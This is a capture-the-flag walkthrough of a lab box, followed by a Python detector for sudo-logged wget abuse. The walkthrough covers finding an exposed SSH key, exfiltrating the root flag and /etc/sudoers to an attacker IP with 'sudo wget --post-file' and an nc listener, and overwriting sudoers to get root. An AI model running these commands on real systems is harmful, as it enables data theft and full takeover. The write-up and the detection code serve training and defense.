Wgel CTF

 ·  ☕ 1 min read  ·  ✍️ M4t35Z

Can you exfiltrate the root flag?

Enumeration

Nmap

  • We have ports 22 and 80 open
    Port 80 source:
<!-- Jessie don't forget to udate the webiste -->
  • We got the username jessie

Dirsearch

  • We found /sitemap

  • Run dirsearch again but now in /sitemap

  • Go to /sitemap/.ssh and download the id_rsa file

Connecting to ssh

chmod 600 id_rsa
ssh -i id_rsa jessie@10.10.109.62

Privilege escalation

sudo -l tells us everything we need: jessie can run /usr/bin/wget as root without a password (NOPASSWD: /usr/bin/wget).

Exploiting the vuln

Attacker:

nc -lvp 1337 > root.txt

Victim:

sudo wget --post-file=/root/root_flag.txt 10.8.22.204:1337

Hold Enter for a while, then press Ctrl+C and cat root.txt

  • We got it

Getting a root shell

  • Get the /etc/sudoers file from the victim
sudo wget --post-file=/etc/sudoers 10.8.22.204:1337

  • Edit it so jessie could just sudo su
    Just replace NOPASSWD: /usr/bin/wget with NOPASSWD: ALL and u r done

  • Download on victim, while replacing the original file

cd /etc
sudo wget 10.8.22.204:8000/files/sudoers --output-document=sudoers

Now we have the edited file

sudo su

We got the root shell!!
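
Seen from the defending side, both wget invocations above are recorded in sudo's log. The following is an added example, not part of the original writeup: it parses sudo syslog lines and reports root wget runs that read a local file (--post-file, --body-file) or write one (--output-document, -O), resolving relative paths against the logged PWD. The sample log lines, the hostname box and the function names are constructed for illustration.

```python
import os
import re

# Constructed sample lines in sudo's usual syslog format (hostname "box" is made up).
SAMPLE_LOG = """\
Mar  3 10:15:01 box sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt 10.8.22.204:1337
Mar  3 10:19:44 box sudo:   jessie : TTY=pts/0 ; PWD=/etc ; USER=root ; COMMAND=/usr/bin/wget 10.8.22.204:8000/files/sudoers --output-document=sudoers
Mar  3 10:25:10 box sudo:   jessie : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/wget https://example.org/pkg.tar.gz
Mar  3 10:26:02 box sudo:   jessie : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)
READ_OPTS = ("--post-file", "--body-file")   # local file sent as the request body
WRITE_OPTS = ("--output-document", "-O")     # local file the response is written to

def option_value(args, names):
    """Value of the first option in `names`; handles --opt=v, --opt v, -O v and -Ov."""
    for i, arg in enumerate(args):
        for name in names:
            if name.startswith("--") and arg.startswith(name + "="):
                return arg[len(name) + 1:]
            if arg == name and i + 1 < len(args):
                return args[i + 1]
            if not name.startswith("--") and arg.startswith(name) and len(arg) > len(name):
                return arg[len(name):]
    return None

def findings(log_text):
    """Return (user, 'read'|'write', path) per root wget run; relative paths use the logged PWD."""
    out = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m or m["runas"] != "root":
            continue
        args = m["cmd"].split()  # sudo logs the arguments joined by single spaces
        if not args or os.path.basename(args[0]) != "wget":
            continue
        for kind, names in (("read", READ_OPTS), ("write", WRITE_OPTS)):
            value = option_value(args[1:], names)
            if value:
                out.append((m["user"], kind, os.path.normpath(os.path.join(m["pwd"], value))))
    return out

if __name__ == "__main__":
    for finding in findings(SAMPLE_LOG):
        print(finding)
```

The second finding resolves to /etc/sudoers only because the PWD field is taken into account, which is why the rule should not match on absolute paths in the command line alone.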